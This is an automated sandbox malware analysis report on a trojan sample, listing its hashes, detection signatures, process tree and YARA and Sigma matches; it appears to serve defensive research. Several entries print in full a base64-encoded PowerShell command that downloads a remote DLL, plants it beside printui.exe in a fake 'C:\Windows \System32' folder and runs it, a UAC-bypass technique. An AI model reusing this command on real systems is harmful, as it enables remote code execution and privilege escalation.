Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exe

Overview

General Information

Sample name:SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exe
Analysis ID:1503230
MD5:7ad7164ed33d36b88c59fad18b28c429
SHA1:40608e5e0b237e695df3b96050ac0e5594ed447e
SHA256:f543aa76f1e5aec622e01f4465d92a87b988039d5a29f5c526419ae075057287
Tags:exe
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: TrustedPath UAC Bypass Pattern
Yara detected Powershell decode and execute
AI detected suspicious sample
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Hijacks the control flow in another process
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Suspicious command line found
Suspicious powershell command line found
Writes to foreign memory regions
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Uncommon Svchost Parent Process
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exe (PID: 4912 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exe" MD5: 7AD7164ED33D36B88C59FAD18B28C429)
    • svchost.exe (PID: 3428 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • cmd.exe (PID: 5704 cmdline: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3BhbmNoaXRvcGlzdG9sZXN4L2l0ZW1zL21haW4vdXN2Y3VzYi5kYXQiIC1PdXRGaWxlICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCI7DQpTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDUwMDA7DQppZiAoVGVzdC1QYXRoICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCIpew0KCU5ldy1JdGVtIC1QYXRoICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiIC1JdGVtVHlwZSBEaXJlY3RvcnkgLUZvcmNlOw0KCUNvcHktSXRlbSAtUGF0aCAiQzpcV2luZG93c1xTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLURlc3RpbmF0aW9uICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLUZvcmNlOw0KCU1vdmUtSXRlbSAtUGF0aCAiQzpcVXNlcnNcJGVudjpVc2VyTmFtZVxBcHBEYXRhXFJvYW1pbmdccHlsZC5kbGwiIC1EZXN0aW5hdGlvbiAiQzpcV2luZG93cyBcU3lzdGVtMzJccHJpbnR1aS5kbGwiIC1Gb3JjZTsNCglTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDE1MDA7DQoJU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIkM6XFdpbmRvd3MgXFN5c3RlbTMyXHByaW50dWkuZXhlIjsJDQp9')); Invoke-Expression $decoded;" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6656 cmdline: powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3BhbmNoaXRvcGlzdG9sZXN4L2l0ZW1zL21haW4vdXN2Y3VzYi5kYXQiIC1PdXRGaWxlICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCI7DQpTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDUwMDA7DQppZiAoVGVzdC1QYXRoICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCIpew0KCU5ldy1JdGVtIC1QYXRoICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiIC1JdGVtVHlwZSBEaXJlY3RvcnkgLUZvcmNlOw0KCUNvcHktSXRlbSAtUGF0aCAiQzpcV2luZG93c1xTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLURlc3RpbmF0aW9uICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLUZvcmNlOw0KCU1vdmUtSXRlbSAtUGF0aCAiQzpcVXNlcnNcJGVudjpVc2VyTmFtZVxBcHBEYXRhXFJvYW1pbmdccHlsZC5kbGwiIC1EZXN0aW5hdGlvbiAiQzpcV2luZG93cyBcU3lzdGVtMzJccHJpbnR1aS5kbGwiIC1Gb3JjZTsNCglTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDE1MDA7DQoJU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIkM6XFdpbmRvd3MgXFN5c3RlbTMyXHByaW50dWkuZXhlIjsJDQp9')); Invoke-Expression $decoded;" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • printui.exe (PID: 6692 cmdline: "C:\Windows \System32\printui.exe" MD5: 2FC3530F3E05667F8240FC77F7486E7E)
          • printui.exe (PID: 1172 cmdline: "C:\Windows \System32\printui.exe" MD5: 2FC3530F3E05667F8240FC77F7486E7E)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 6656INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x113a61:$b2: ::FromBase64String(
  • 0x1174cd:$b2: ::FromBase64String(
  • 0x11eec0:$b2: ::FromBase64String(
  • 0x14dc4b:$b2: ::FromBase64String(
  • 0x201616:$b2: ::FromBase64String(
  • 0x201a15:$b2: ::FromBase64String(
  • 0x202015:$b2: ::FromBase64String(
  • 0x2025cf:$b2: ::FromBase64String(
  • 0x24c36c:$b2: ::FromBase64String(
  • 0x34c30c:$b2: ::FromBase64String(
  • 0x34c70d:$b2: ::FromBase64String(
  • 0x34cc2c:$b2: ::FromBase64String(
  • 0x34ea63:$b2: ::FromBase64String(
  • 0x34ee60:$b2: ::FromBase64String(
  • 0x34fad8:$b2: ::FromBase64String(
  • 0x367256:$b2: ::FromBase64String(
  • 0x367653:$b2: ::FromBase64String(
  • 0x3694e0:$b2: ::FromBase64String(
  • 0x3698dd:$b2: ::FromBase64String(
  • 0x40291b:$b2: ::FromBase64String(
  • 0x440396:$b2: ::FromBase64String(

Other

SourceRuleDescriptionAuthorStrings
amsi64_6656.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
    amsi64_6656.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0xa0:$b2: ::FromBase64String(
    • 0x7f:$b3: ::UTF8.GetString(
    • 0xbc7a:$s1: -join
    • 0x5426:$s4: +=
    • 0x54e8:$s4: +=
    • 0x970f:$s4: +=
    • 0xb82c:$s4: +=
    • 0xbb16:$s4: +=
    • 0xbc5c:$s4: +=
    • 0xe115:$s4: +=
    • 0xe195:$s4: +=
    • 0xe25b:$s4: +=
    • 0xe2db:$s4: +=
    • 0xe4b1:$s4: +=
    • 0xe535:$s4: +=
    • 0xc244:$e4: Start-Process
    • 0xc5fe:$e4: Get-WmiObject
    • 0xc7ed:$e4: Get-Process
    • 0xc845:$e4: Start-Process

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: TrustedPath UAC Bypass Pattern
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows \System32\printui.exe" , CommandLine: "C:\Windows \System32\printui.exe" , CommandLine|base64offset|contains: , Image: C:\Windows \System32\printui.exe, NewProcessName: C:\Windows \System32\printui.exe, OriginalFileName: C:\Windows \System32\printui.exe, ParentCommandLine: powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3BhbmNoaXRvcGlzdG9sZXN4L2l0ZW1zL21haW4vdXN2Y3VzYi5kYXQiIC1PdXRGaWxlICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCI7DQpTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDUwMDA7DQppZiAoVGVzdC1QYXRoICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCIpew0KCU5ldy1JdGVtIC1QYXRoICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiIC1JdGVtVHlwZSBEaXJlY3RvcnkgLUZvcmNlOw0KCUNvcHktSXRlbSAtUGF0aCAiQzpcV2luZG93c1xTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLURlc3RpbmF0aW9uICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLUZvcmNlOw0KCU1vdmUtSXRlbSAtUGF0aCAiQzpcVXNlcnNcJGVudjpVc2VyTmFtZVxBcHBEYXRhXFJvYW1pbmdccHlsZC5kbGwiIC1EZXN0aW5hdGlvbiAiQzpcV2luZG93cyBcU3lzdGVtMzJccHJpbnR1aS5kbGwiIC1Gb3JjZTsNCglTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDE1MDA7DQoJU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIkM6XFdpbmRvd3MgXFN5c3RlbTMyXHByaW50dWkuZXhlIjsJDQp9')); Invoke-Expression $decoded;", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6656, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows \System32\printui.exe" , ProcessId: 6692, ProcessName: printui.exe
    Sigma detected: Base64 Encoded PowerShell Command Detected
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3BhbmNoaXRvcGlzdG9sZXN4L2l0ZW1zL21haW4vdXN2Y3VzYi5kYXQiIC1PdXRGaWxlICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCI7DQpTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDUwMDA7DQppZiAoVGVzdC1QYXRoICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCIpew0KCU5ldy1JdGVtIC1QYXRoICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiIC1JdGVtVHlwZSBEaXJlY3RvcnkgLUZvcmNlOw0KCUNvcHktSXRlbSAtUGF0aCAiQzpcV2luZG93c1xTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLURlc3RpbmF0aW9uICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLUZvcmNlOw0KCU1vdmUtSXRlbSAtUGF0aCAiQzpcVXNlcnNcJGVudjpVc2VyTmFtZVxBcHBEYXRhXFJvYW1pbmdccHlsZC5kbGwiIC1EZXN0aW5hdGlvbiAiQzpcV2luZG93cyBcU3lzdGVtMzJccHJpbnR1aS5kbGwiIC1Gb3JjZTsNCglTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDE1MDA7DQoJU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIkM6XFdpbmRvd3MgXFN5c3RlbTMyXHByaW50dWkuZXhlIjsJDQp9')); Invoke-Expression $decoded;", CommandLine: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3BhbmNoaXRvcGlzdG9sZXN4L2l0ZW1zL21haW4vdXN2Y3VzYi5kYXQiIC1PdXRGaWxlICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCI7DQpTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDUwMDA7DQppZiAoVGVzdC1QYXRoICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCIpew0KCU5ldy1JdGVtIC1QYXRoICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiIC1JdGVtVHlwZSBEaXJlY3RvcnkgLUZvcmNlOw0KCUNvcHktSXRlbSAtUGF0aCAiQzpcV2luZG93c1xTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLURlc3RpbmF0aW9uICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLUZvcmNlOw0KCU1vdmUtSXRlbSAtUGF0aCAiQzpcVXNlcnNcJGVudjpVc2VyTmFtZVxBcHBEYXRhXFJvYW1pbmdccHlsZC5kbGwiIC1EZXN0aW5hdGlvbiAiQzpcV2luZG93cyBcU3lzdGVtMzJccHJpbnR1aS5kbGwiIC1Gb3JjZTsNCglTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDE1MDA7DQoJU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIkM6XFdpbmRvd3MgXFN5c3RlbTMyXHByaW50dWkuZXhlIjsJDQp9')); Invoke-Expression $decoded;", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, ParentImage: C:\Windows\System32\svchost.exe, ParentProcessId: 3428, ParentProcessName: svchost.exe, ProcessCommandLine: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3BhbmNoaXRvcGlzdG9sZXN4L2l0ZW1zL21haW4vdXN2Y3VzYi5kYXQiIC1PdXRGaWxlICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCI7DQpTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDUwMDA7DQppZiAoVGVzdC1QYXRoICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCIpew0KCU5ldy1JdGVtIC1QYXRoICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiIC1
    Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3BhbmNoaXRvcGlzdG9sZXN4L2l0ZW1zL21haW4vdXN2Y3VzYi5kYXQiIC1PdXRGaWxlICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCI7DQpTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDUwMDA7DQppZiAoVGVzdC1QYXRoICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCIpew0KCU5ldy1JdGVtIC1QYXRoICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiIC1JdGVtVHlwZSBEaXJlY3RvcnkgLUZvcmNlOw0KCUNvcHktSXRlbSAtUGF0aCAiQzpcV2luZG93c1xTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLURlc3RpbmF0aW9uICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLUZvcmNlOw0KCU1vdmUtSXRlbSAtUGF0aCAiQzpcVXNlcnNcJGVudjpVc2VyTmFtZVxBcHBEYXRhXFJvYW1pbmdccHlsZC5kbGwiIC1EZXN0aW5hdGlvbiAiQzpcV2luZG93cyBcU3lzdGVtMzJccHJpbnR1aS5kbGwiIC1Gb3JjZTsNCglTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDE1MDA7DQoJU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIkM6XFdpbmRvd3MgXFN5c3RlbTMyXHByaW50dWkuZXhlIjsJDQp9')); Invoke-Expression $decoded;", CommandLine: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3BhbmNoaXRvcGlzdG9sZXN4L2l0ZW1zL21haW4vdXN2Y3VzYi5kYXQiIC1PdXRGaWxlICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCI7DQpTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDUwMDA7DQppZiAoVGVzdC1QYXRoICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCIpew0KCU5ldy1JdGVtIC1QYXRoICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiIC1JdGVtVHlwZSBEaXJlY3RvcnkgLUZvcmNlOw0KCUNvcHktSXRlbSAtUGF0aCAiQzpcV2luZG93c1xTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLURlc3RpbmF0aW9uICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLUZvcmNlOw0KCU1vdmUtSXRlbSAtUGF0aCAiQzpcVXNlcnNcJGVudjpVc2VyTmFtZVxBcHBEYXRhXFJvYW1pbmdccHlsZC5kbGwiIC1EZXN0aW5hdGlvbiAiQzpcV2luZG93cyBcU3lzdGVtMzJccHJpbnR1aS5kbGwiIC1Gb3JjZTsNCglTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDE1MDA7DQoJU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIkM6XFdpbmRvd3MgXFN5c3RlbTMyXHByaW50dWkuZXhlIjsJDQp9')); Invoke-Expression $decoded;", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, ParentImage: C:\Windows\System32\svchost.exe, ParentProcessId: 3428, ParentProcessName: svchost.exe, ProcessCommandLine: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3BhbmNoaXRvcGlzdG9sZXN4L2l0ZW1zL21haW4vdXN2Y3VzYi5kYXQiIC1PdXRGaWxlICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCI7DQpTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDUwMDA7DQppZiAoVGVzdC1QYXRoICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCIpew0KCU5ldy1JdGVtIC1QYXRoICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiIC1
    Sigma detected: Potential Binary Or Script Dropper Via PowerShell
    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6656, TargetFilename: C:\Users\user\AppData\Roaming\pyld.dll
    Sigma detected: Uncommon Svchost Parent Process
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exe, ParentProcessId: 4912, ParentProcessName: SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, ProcessId: 3428, ProcessName: svchost.exe
    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3BhbmNoaXRvcGlzdG9sZXN4L2l0ZW1zL21haW4vdXN2Y3VzYi5kYXQiIC1PdXRGaWxlICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCI7DQpTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDUwMDA7DQppZiAoVGVzdC1QYXRoICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCIpew0KCU5ldy1JdGVtIC1QYXRoICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiIC1JdGVtVHlwZSBEaXJlY3RvcnkgLUZvcmNlOw0KCUNvcHktSXRlbSAtUGF0aCAiQzpcV2luZG93c1xTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLURlc3RpbmF0aW9uICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLUZvcmNlOw0KCU1vdmUtSXRlbSAtUGF0aCAiQzpcVXNlcnNcJGVudjpVc2VyTmFtZVxBcHBEYXRhXFJvYW1pbmdccHlsZC5kbGwiIC1EZXN0aW5hdGlvbiAiQzpcV2luZG93cyBcU3lzdGVtMzJccHJpbnR1aS5kbGwiIC1Gb3JjZTsNCglTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDE1MDA7DQoJU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIkM6XFdpbmRvd3MgXFN5c3RlbTMyXHByaW50dWkuZXhlIjsJDQp9')); Invoke-Expression $decoded;", CommandLine: powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3BhbmNoaXRvcGlzdG9sZXN4L2l0ZW1zL21haW4vdXN2Y3VzYi5kYXQiIC1PdXRGaWxlICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCI7DQpTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDUwMDA7DQppZiAoVGVzdC1QYXRoICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCIpew0KCU5ldy1JdGVtIC1QYXRoICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiIC1JdGVtVHlwZSBEaXJlY3RvcnkgLUZvcmNlOw0KCUNvcHktSXRlbSAtUGF0aCAiQzpcV2luZG93c1xTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLURlc3RpbmF0aW9uICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLUZvcmNlOw0KCU1vdmUtSXRlbSAtUGF0aCAiQzpcVXNlcnNcJGVudjpVc2VyTmFtZVxBcHBEYXRhXFJvYW1pbmdccHlsZC5kbGwiIC1EZXN0aW5hdGlvbiAiQzpcV2luZG93cyBcU3lzdGVtMzJccHJpbnR1aS5kbGwiIC1Gb3JjZTsNCglTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDE1MDA7DQoJU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIkM6XFdpbmRvd3MgXFN5c3RlbTMyXHByaW50dWkuZXhlIjsJDQp9')); Invoke-Expression $decoded;", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3BhbmNoaXRvcGlzdG9sZXN4L2l0ZW1zL21haW4vdXN2Y3VzYi5kYXQiIC1PdXRGaWxlICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCI7DQpTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDUwMDA7DQppZiAoVGVzdC1QYXRoICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCIpew0KCU5ldy1JdGVtIC1QYXRoICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiIC1JdGVtVHlwZSBEaXJlY3RvcnkgLUZvcmNlOw0KCUNvcHktSXRlbSAtUGF0aCAiQzpcV2luZG93c1xTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLURlc3Rpb
    Sigma detected: Windows Processes Suspicious Parent Directory
    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exe, ParentProcessId: 4912, ParentProcessName: SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, ProcessId: 3428, ProcessName: svchost.exe

    Suricata Signatures

    No Suricata rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Multi AV Scanner detection for submitted file
    Source: SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeReversingLabs: Detection: 42%
    Source: SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeVirustotal: Detection: 36%Perma Link
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
